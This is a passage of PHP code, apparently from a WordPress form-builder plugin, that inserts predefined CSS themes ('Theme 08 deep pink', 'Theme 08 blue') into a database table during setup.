80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 08 deep pink\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #930049;\r\nmargin-bottom: 10px;\r\ncolor: #930049;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #930049 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #930049;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #EEEEEE;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #930049;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #930049;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="text"]:focus {\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #636363;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8A8A8A;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8A8A8A;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #930049;\r\ncursor: pointer;\r\nbackground-color: #fff;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #930049;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98%;\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #fff;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 08 blue\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #070068;\r\nmargin-bottom: 10px;\r\ncolor: #070068;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #070068 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #070068;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #070068;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #070068;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="text"]:focus {\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #636363;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 